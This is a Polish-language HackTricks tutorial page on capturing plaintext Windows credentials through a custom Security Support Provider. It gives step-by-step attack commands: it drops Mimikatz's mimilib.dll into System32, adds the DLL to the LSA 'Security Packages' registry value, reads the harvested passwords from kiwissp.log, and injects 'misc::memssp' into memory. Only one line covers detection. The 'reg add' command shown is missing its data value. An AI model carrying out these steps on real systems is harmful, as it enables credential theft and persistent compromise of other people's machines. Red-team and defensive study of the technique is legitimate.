3.8 KiB
Naucz się hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!
Inne sposoby wsparcia HackTricks:
- Jeśli chcesz zobaczyć swoją firmę reklamowaną w HackTricks lub pobrać HackTricks w formacie PDF, sprawdź PLAN SUBSKRYPCYJNY!
- Zdobądź oficjalne gadżety PEASS & HackTricks
- Odkryj Rodzinę PEASS, naszą kolekcję ekskluzywnych NFT
- Dołącz do 💬 grupy Discord lub grupy telegramowej lub śledź nas na Twitterze 🐦 @carlospolopm.
- Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do HackTricks i HackTricks Cloud github repos.
Niestandardowy SSP
Dowiedz się, czym jest SSP (Security Support Provider) tutaj.
Możesz stworzyć własny SSP, aby przechwycić w czystym tekście poświadczenia używane do dostępu do maszyny.
Mimilib
Możesz użyć binarnego pliku mimilib.dll
dostarczonego przez Mimikatz. Spowoduje to zapisanie wszystkich poświadczeń w czystym tekście do pliku.
Upuść plik DLL w C:\Windows\System32\
Pobierz listę istniejących pakietów zabezpieczeń LSA:
{% code title="attacker@target" %}
PS C:\> reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"
HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa
Security Packages REG_MULTI_SZ kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u
{% endcode %}
Dodaj mimilib.dll
do listy dostawców obsługi zabezpieczeń (Security Packages):
reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages"
I po ponownym uruchomieniu wszystkie poświadczenia można znaleźć w postaci tekstu jawnego w C:\Windows\System32\kiwissp.log
W pamięci
Możesz również wstrzyknąć to bezpośrednio do pamięci za pomocą Mimikatz (zauważ, że może to być trochę niestabilne/nie działać):
privilege::debug
misc::memssp
To nie przetrwa restartów.
Zapobieganie
Identyfikator zdarzenia 4657 - Audyt tworzenia/zmiany HKLM:\System\CurrentControlSet\Control\Lsa\SecurityPackages
Naucz się hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!
Inne sposoby wsparcia HackTricks:
- Jeśli chcesz zobaczyć reklamę swojej firmy w HackTricks lub pobrać HackTricks w formacie PDF, sprawdź PLAN SUBSKRYPCYJNY!
- Zdobądź oficjalne gadżety PEASS & HackTricks
- Odkryj Rodzinę PEASS, naszą kolekcję ekskluzywnych NFT
- Dołącz do 💬 grupy Discord lub grupy telegramowej lub śledź nas na Twitterze 🐦 @carlospolopm.
- Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do HackTricks i HackTricks Cloud repozytoriów GitHub.